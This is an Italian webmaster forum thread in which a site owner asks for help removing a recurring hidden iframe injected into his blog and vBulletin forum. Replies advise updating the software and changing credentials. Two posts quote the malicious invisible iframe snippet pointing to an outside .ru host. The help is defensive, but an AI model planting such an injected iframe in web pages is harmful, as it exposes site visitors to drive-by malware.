+ Rispondi alla Discussione
Risultati da 1 a 10 di 10

[Risolto] Malware sul sito

Ultimo Messaggio di darkjoker il:
  1. #1
    User L'avatar di Gabriel_Ambrogio
    Data Registrazione
    Feb 2009
    LocalitÓ
    Reggio Calabria
    Messaggi
    63

    [Risolto] Malware sul sito

    Ciao a tutti, sono giorni che sul mio sito SIA sul blog che sul forum compare un iframe che google vede come Malware , in effetti lo Ŕ

    si tratta di questo codice

    Codice PHP:
    <iframe src="http(duepuntislashslash)directs134.ru/in.cgi?wal" height="1" wid
    th
    ="1" hspace="0" vspace="0" marginwidth="0" marginheight="0
    "

    Lo cancello e poi ritorna, idem sul forum... Non so cosa devo fare! Google mi sta uccidendo e sto perdendo visite, piano piano per colpa di questo maledetto virus sto perdendo tutte le visite.


    Grazie all'Hacker che l'ha messo..

  2. #2
    Moderatore L'avatar di ZioMike
    Data Registrazione
    Sep 2009
    LocalitÓ
    Milano
    Messaggi
    1,501
    Segui ZioMike su Twitter Aggiungi ZioMike su Linkedin
    Ciao Gabriel,
    sposto il tuo topic nella sezione Sicurezza Informatica che Ŕ la tematica pi¨ vicina alla tua problematica

  3. #3
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    LocalitÓ
    Calabria
    Messaggi
    7,483
    Segui Wolf Otakar su Twitter
    Ciao Gabriel,


    forse perchŔ elimini "solo in parte" il codice infetto!


    Comunque, verifica le cartelle di WP e le ultime modifiche apportate "la data", troverai numerosi file con questa stringa di codice infetto:


    <iframe src="http://directs134.ru/in.cgi?wal" height="1" width="1" hspace="0" vspace="0" marginwidth="0" marginheight="0">

    Fatto questo, verifica gli aggiornamenti "se disponibili, di plugin e temi", e modifica anche i dati di accesso "ftp ed admin".

    p.s. per trovare il codice infetto, prova questo tool online: http://sucuri.net/

  4. #4
    User L'avatar di Gabriel_Ambrogio
    Data Registrazione
    Feb 2009
    LocalitÓ
    Reggio Calabria
    Messaggi
    63
    Il problema sta che non ci sono file editati nel ftp con date recenti! E sul blog ho risolto togliendo una stringa a mano mentre sul forum ( vBulletin ) non so cosa fare! Google mi sta penalizzando e sto perdendo il lavoro di anni..

    Sono disperato..

  5. #5
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    LocalitÓ
    Calabria
    Messaggi
    7,483
    Segui Wolf Otakar su Twitter
    Citazione Originariamente Scritto da Gabriel_Ambrogio Visualizza Messaggio
    ....... sul blog ho risolto togliendo una stringa a mano
    ... sicuro???


  6. #6
    User L'avatar di Gabriel_Ambrogio
    Data Registrazione
    Feb 2009
    LocalitÓ
    Reggio Calabria
    Messaggi
    63
    Nelle pagine quel codice non Ŕ pi¨ presente! Puoi controllare tu stesso! Non so cosa posso fare! sono senza idee senza metodi..

    Solo sul forum nel codice sorgente compare quel cavolo di codice!

  7. #7
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    LocalitÓ
    Calabria
    Messaggi
    7,483
    Segui Wolf Otakar su Twitter
    Ciao Gabriel,


    Citazione Originariamente Scritto da Gabriel_Ambrogio Visualizza Messaggio
    Nelle pagine quel codice non Ŕ pi¨ presente!
    confermo, anche il forum!

  8. #8
    User L'avatar di Gabriel_Ambrogio
    Data Registrazione
    Feb 2009
    LocalitÓ
    Reggio Calabria
    Messaggi
    63
    [******]



    Problem Solved, Ŕ bastato aggiornare i file di vBulletin e il virus in iFrame Ŕ sparito, mi domando : PerchŔ? Che stregoneria Ŕ mai questa?
    Ultima modifica di Wolf Otakar; 31-10-12 alle 10:03 Motivo: Quote inutile! ;)

  9. #9
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    LocalitÓ
    Calabria
    Messaggi
    7,483
    Segui Wolf Otakar su Twitter
    Ciao Gabriel,


    Citazione Originariamente Scritto da Gabriel_Ambrogio Visualizza Messaggio
    Problem Solved, Ŕ bastato aggiornare i file di vBulletin
    modifica per "sicurezza" anche i dati di accesso "ftp ed admin".


  10. #10
    User Newbie L'avatar di darkjoker
    Data Registrazione
    Nov 2012
    LocalitÓ
    Torino
    Messaggi
    3
    Fare ipotesi senza avere niente da controllare Ŕ un po' difficile.. Ma se la situazione Ŕ quella che credo, si pu˛ assumere che, tra gli script php, ce n'era uno infetto che, ogni volta che veniva eseguito (ossia ogni volta che lo script php viene richiesto), andava a inserire il frame in tutte le pagine "possibili".. Quindi, anche se te cancellavi il frame, lo script, una volta caricato, te lo faceva ricomparire.
    Se, come hai detto te, aggiornando i file il problema si Ŕ risolto, ci˛ pu˛ significare che lo script "infetto" Ŕ uno dei file aggiornati, che venendo quindi sostituito non presenta pi¨ il codice maligno che aggiunge il frame alle varie pagine ogni volta che viene caricato.

    Questa, ovviamente, Ŕ solo un'ipotesi fatta col (quasi nullo) materiale a disposizione.. Non prenderla per oro colato, ma mi sembra una cosa plausibile

+ Rispondi alla Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB Ŕ Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] Ŕ Attivato
  • Il codice [VIDEO] Ŕ Attivato
  • Il codice HTML Ŕ Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.